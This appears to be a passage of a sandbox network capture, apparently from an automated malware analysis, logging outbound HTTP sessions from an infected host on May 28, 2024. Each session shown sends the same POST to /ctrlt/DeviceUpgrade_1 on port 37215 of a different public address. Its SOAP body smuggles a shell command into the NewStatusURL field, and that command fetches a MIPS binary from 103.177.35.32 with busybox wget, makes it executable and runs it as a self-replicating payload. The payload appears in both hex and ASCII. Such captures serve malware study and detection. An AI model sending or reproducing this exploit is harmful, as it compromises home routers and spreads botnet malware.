                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1491192.168.2.234265441.124.190.12837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543215036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1492192.168.2.2353088197.83.90.3337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543229103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1493192.168.2.2351468197.29.134.5137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543229103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1494192.168.2.2360034197.91.47.19137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543379068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1495192.168.2.234380441.157.179.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543417931 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1496192.168.2.2360118197.51.194.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543427944 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1497192.168.2.2353938157.222.192.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543456078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1498192.168.2.234101841.19.167.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543456078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1499192.168.2.234131441.14.21.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543462992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1500192.168.2.2335956157.204.91.21737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543467045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
